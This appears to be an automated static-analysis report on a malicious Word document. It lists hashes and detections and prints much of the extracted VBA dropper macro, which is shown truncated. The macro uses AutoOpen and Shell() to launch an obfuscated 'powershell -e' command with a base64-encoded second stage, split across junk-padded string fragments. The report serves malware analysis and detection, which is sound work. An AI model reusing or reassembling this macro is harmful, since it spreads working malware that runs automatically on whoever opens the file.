Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b7f938aa35083674…

MALICIOUS

Office (OLE)

Size: 95.8 KB
Created: 2018-06-12 13:41:00
Authoring application: Microsoft Office Word
First seen: 2018-08-05
MD5: c734da2d1b8af49cb29a93236ae590ab
SHA-1: d43264bf200a616ce769010e62bb40ba8cdcc537
SHA-256: b7f938aa350836740c0e76952d93cee15abfe803c9bf907664778019c37552e2
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The Autoopen macro triggers a Shell() call, which is obfuscated but appears to be designed to download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-6582624-0' further supports its role as a dropper.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6582651-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6582651-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13342 bytes
SHA-256: 34efa8f66ede29ae7fc387d783e9dfecdf78c843258b7f23b2622524a8b2bcdb
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "AitXrChkSw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function VIiCqhHVG()
On Error Resume Next
Vzqzvw = Tan(28818)
uilCj = NJBMCz
QrLYG = CDbl(LWpVt)
WThCj = QkKZzN
irdip = Hex(SUVFG * ChrW(bopDqE + Int(rnNOj * Rnd(14651)) * jmNHr * Log(84347 * XXRisz - auAOa + Fix(51))))
FnbjU = Tan(39840)
VNVdzW = Tan(38714)
jHOOOj = RXUzE
RsNAF = CDbl(QvLjmW)
bJCok = fjunm
MrBWD = Hex(WPpEV * ChrW(crnDj + Int(abrME * Rnd(87154)) * ijcYU * Log(44270 * bAtsO - HUPGL + Fix(51))))
ouLti = Tan(53881)
VIiCqhHVG = FfznCkQc + Shell(zBbwiNf + Chr(sBEWRNtzBv + vbKeyP + RGQlMnfNsOX) + "owers" + EliRH + mUiNHJa + EjqhjW + zoVYabd + iDMhoEEf, 33556 - 33556)
ZMKIzn = Tan(16257)
VcuqV = Rjcwup
MGMkA = CDbl(FUXquw)
zrQrt = GRmrV
qpXNi = Hex(nmrMGw * ChrW(wGDnz + Int(zuAkZQ * Rnd(71855)) * pjqaO * Log(81625 * KrhHo - GKdklS + Fix(51))))
vzCdo = Tan(11444)
End Function
Sub Autoopen()
On Error Resume Next
VpFzz = Tan(95066)
wDAmrH = oOVjJ
tjXzoz = CDbl(JqjMl)
UzVlj = qFIGc
uLRGkj = Hex(fPclRF * ChrW(AfjIW + Int(BinCTd * Rnd(72458)) * Slldv * Log(4162 * mACFzP - trODj + Fix(51))))
JLYzjo = Tan(93253)
VIiCqhHVG
YOnHv = Tan(50610)
irIWD = NfiCX
vpvoP = CDbl(LNHMlt)
FiNlO = EptOAF
cKvftz = Hex(QBWda * ChrW(KjNFR + Int(PPzhA * Rnd(88003)) * ESiBa * Log(89852 * iUBRbT - jqELkL + Fix(51))))
oUcowu = Tan(80646)
End Sub
Attribute VB_Name = "icvmdsthA"
Function EliRH()
On Error Resume Next
wEOMCG = Tan(76304)
WQihf = jwWUHi
QUrWv = CDbl(NmlbD)
hwJqwF = FYTJvi
ivRswa = Hex(sfkWq * ChrW(pafko + Int(mwhXIa * Rnd(28681)) * cizKwn * Log(4961 * RUtdca - QZTGwp + Fix(51))))
siVTvu = Tan(365)
kQaiPDiDzpR = "HeLL " + "-e IAAuACgAI" + "AAkAGU" + "AbgB" + "WA" + "DoAYwBPAG0A"
IRjzs = Tan(19248)
aaCEGI = rLzMK
zpTQn = CDbl(qOpdsI)
tMbtih = iztEuj
irJTj = Hex(iaTzTK * ChrW(TTkwJv + Int(PwPRV * Rnd(59078)) * iwvPVD * Log(51312 * XfJIY - SsdaUm + Fix(51))))
POwuz = Tan(24297)
PzjcLmv = "UwBwAGUAQwBbADQ" + "ALAAyADYALAAyAD" + "UAXQA" + "tAGoATwBJAG" + "4A" + "JwAnACkAIAAoAG" + "4ARQBXAC0ATw" + "BCAEoAZQBDAHQA" + "IABzAFkAUwB0AE" + "UA"
jbswE = Tan(7557)
bXizG = LvFnB
XwFmr = CDbl(sVSkz)
WrTYv = LEUzrV
cNRwTI = Hex(tcpKd * ChrW(BzMihr + Int(NbPAn * Rnd(99725)) * czCXF * Log(69577 * OnaWzb - buBJuG + Fix(51))))
NrmRzz = Tan(65151)
FjTASWAIXQm = "bQAuAEkATw" + "AuAGMA" + "bwBtAFAA" + "UgBFAHMAUwB" + "JAG8ATgAuAGQA"
wQLTp = Tan(64499)
ZREtwm = lLiPi
hNrsth = CDbl(FQFFm)
NpKLf = IfUjFA
wDGaj = Hex(OwUkZS * ChrW(HSqJLw + Int(pZUaz * Rnd(6124)) * aFMils * Log(71033 * LwpWVX - sFktE + Fix(51))))
poKXGt = Tan(36496)
ZPRPbiTN = "ZQBm" + "AEwAQQB0AE" + "UAcwBU" + "AHIARQBBAG0AKA" + "BbAFMAWQBT" + "AHQAZQBNAC4"
ifafH = Tan(78768)
HFnapY = sUpdj
jPqGww = CDbl(RCGiwR)
cSOqN = WlzwTP
hwqid = Hex(qrTpT * ChrW(JEZFzJ + Int(XOfZFw * Rnd(29658)) * GvPtn * Log(68206 * DULXAn - SIduJD + Fix(51))))
wjAnrr = Tan(84273)
SYKFvzZ = "AaQBvA" + "C4ATQBlAE" + "0AT" + "wBSAHkAUw" + "B0AHIAR" + "QBhA" + "G0"
WkkOK = Tan(68971)
EwjwRB = tbIow
XwKoLV = CDbl(OPFws)
Bzanm = rWEjOL
dsmYfD = Hex(wiaavC * ChrW(ahorkF + Int(zGSoV * Rnd(21801)) * ZTPwd * Log(48574 * RcqZtz - WXArj + Fix(51))))
RoPpiF = Tan(39606)
jkilcpIV = "AXQAgA" + "FsAcwBZA" + "FMAVABFAE0ALgBD" + "AE8ATgB" + "WAEUAUgBUA" + "F0AOgA6AEY" + "AUgBvAG0AYgBhA" + "FMAZQA2ADQAU" + "wB0"
lUkJrq = Tan(43415)
LiSdz = FzRrI
djSwm = CDbl(mlDaR)
ENjHG = BGhKM
ZFqJi = Hex(XnwGA * ChrW(CnXUE + Int(IkMuZj * Rnd(53570)) * rCpCjS * Log(45619 * XjhdCm - ibzNf + Fix(51))))
TrhCw = Tan(4534)
jKDvUjjzarH = "AFIAaQBuAEcA" + "KAA" + "nAFYAWgBC" + "AHIAVAA4AEk" + "AdwBGAEk"
JfjGhk = Tan(51042)
zuahd = Qrmai
hhSbV = CDbl(sXKIAk)
wmrza = RLihhX
BwCAub = Hex(jubMF * ChrW(krCKpu + Int(QhUZsL * Rnd(58631)) * KwAlE * Log(79522 * uVKNYX - BKitpL + Fix(51))))
IXsnj = Tan(30223)
wpDbT = "AYgAvAFMA" + "agA4AHMARwBVA" + "FQAcABJAHMAUwB" + "BAEwAQwB"
idIiz = Ta
... (truncated)